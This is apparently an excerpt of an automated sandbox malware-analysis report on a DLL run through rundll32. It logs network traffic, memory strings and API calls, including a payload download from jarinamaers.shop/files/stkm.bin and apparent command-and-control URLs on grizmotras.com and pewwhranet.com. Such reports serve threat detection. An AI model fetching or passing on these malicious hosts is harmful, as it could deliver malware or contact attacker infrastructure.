    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /files/stkm.bin HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
    Host: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: grizmotras.com
Source: global traffic DNS traffic detected: DNS query: pewwhranet.com
Source: unknown HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr String found in binary or memory: ftp://ftp%2desktop.ini
Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr String found in binary or memory: http://dr.f.360.cn/scanlist
Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096149688.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/c
Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3704000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3502753170.000001E3B5740000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949671397.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/1-0
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/3
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/6
Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/My
Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/
Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/d
Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/e
Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/o
Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/ras.com/live/
Source: rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/p
Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/x
Source: rundll32.exe, 00000008.00000003.3365882413.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/$
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/V%
Source: rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/files/stkm.bin
Source: rundll32.exe, 00000008.00000003.3365701357.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365798220.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/files/stkm.binZ&XRr
Source: rundll32.exe, 00000008.00000003.3330399474.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/ive/dOIDInfo
Source: rundll32.exe, 00000008.00000003.3264129627.000001E3B3709000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/
Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/l
Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3502753170.000001E3B5740000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949671397.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/
Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/)
Source: rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/ll
Source: C:\Windows\System32\rundll32.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CB0C4 NtOpenKey,RtlpNtOpenKey, 4_2_00000237C16CB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C78C0 NtReadFile, 4_2_00000237C16C78C0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7B40 NtFreeVirtualMemory, 4_2_00000237C16C7B40
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CAD34 NtAllocateVirtualMemory, 4_2_00000237C16CAD34
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 4_2_00000237C16CB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C79C8 NtClose, 4_2_00000237C16C79C8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C77B0 RtlInitUnicodeString,NtCreateFile, 4_2_00000237C16C77B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C378C NtClose, 4_2_00000237C16C378C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7588 RtlInitUnicodeString,NtCreateFile,NtClose, 4_2_00000237C16C7588
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 4_2_00000237C16C463C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7A54 NtWriteFile, 4_2_00000237C16C7A54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0AC0 NtFreeVirtualMemory, 4_2_00000237C16D0AC0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7ACC NtClose, 4_2_00000237C16C7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0A78 NtClose, 4_2_00000237C16D0A78
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7694 RtlInitUnicodeString,NtDeleteFile, 4_2_00000237C16C7694
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0A90 NtDeleteFile, 4_2_00000237C16D0A90
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C745C RtlInitUnicodeString,NtOpenFile,NtClose, 4_2_00000237C16C745C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CCB54 NtDelayExecution, 4_2_00000237C16CCB54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7704 NtQueryInformationFile, 4_2_00000237C16C7704
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0AF0 NtWriteFile, 4_2_00000237C16D0AF0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E248C NtFreeVirtualMemory, 8_3_000001E3B57E248C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E241C NtAllocateVirtualMemory, 8_3_000001E3B57E241C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A2C8: DeviceIoControl, 3_2_000000018006A2C8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017FE8 3_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006DFF4 3_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800220D8 3_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007C140 3_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060174 3_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008023C 3_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000834C 3_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006C470 3_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800784E0 3_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800764F0 3_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060578 3_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010580 3_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004E5DC 3_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062600 3_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002610 3_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180004638 3_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E760 3_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800647B0 3_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007E7C7 3_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180076930 3_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062954 3_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A994 3_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E9FC 3_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180082A18 3_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180072A27 3_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010B58 3_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180026C84 3_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001ECF4 3_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180008E20 3_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180052FD8 3_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003AFE8 3_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005D014 3_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F0B4 3_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800630CC 3_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005912C 3_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007B2D0 3_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002B2EC 3_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006D3D4 3_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180075480 3_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800694A0 3_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005958C 3_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800576DC 3_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800097E0 3_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800277FC 3_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002D964 3_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073B60 3_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007BBB0 3_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001BC38 3_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005DD18 3_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073DF0 3_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180011DF0 3_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005BE6C 3_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FF88 3_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1030 4_2_00000237C16C1030
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E4B50 8_3_000001E3B57E4B50
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5879708 8_3_000001E3B5879708
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E453C 8_3_000001E3B57E453C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5862B38 8_3_000001E3B5862B38
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586DB34 8_3_000001E3B586DB34
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5850B54 8_3_000001E3B5850B54
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582EA84 8_3_000001E3B582EA84
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5810A8A 8_3_000001E3B5810A8A
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57ED9E4 8_3_000001E3B57ED9E4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5810D18 8_3_000001E3B5810D18
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E9CBC 8_3_000001E3B57E9CBC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5855D68 8_3_000001E3B5855D68
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5847C14 8_3_000001E3B5847C14
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B580FC72 8_3_000001E3B580FC72
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582BB94 8_3_000001E3B582BB94
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B587EBB8 8_3_000001E3B587EBB8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B585672C 8_3_000001E3B585672C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5805768 8_3_000001E3B5805768
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586D63C 8_3_000001E3B586D63C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5809650 8_3_000001E3B5809650
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58105A0 8_3_000001E3B58105A0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582B5D0 8_3_000001E3B582B5D0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B580F5FB 8_3_000001E3B580F5FB
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58405FC 8_3_000001E3B58405FC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5874940 8_3_000001E3B5874940
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5858980 8_3_000001E3B5858980
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58598B0 8_3_000001E3B58598B0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586D8B8 8_3_000001E3B586D8B8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5818824 8_3_000001E3B5818824
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57F77E0 8_3_000001E3B57F77E0
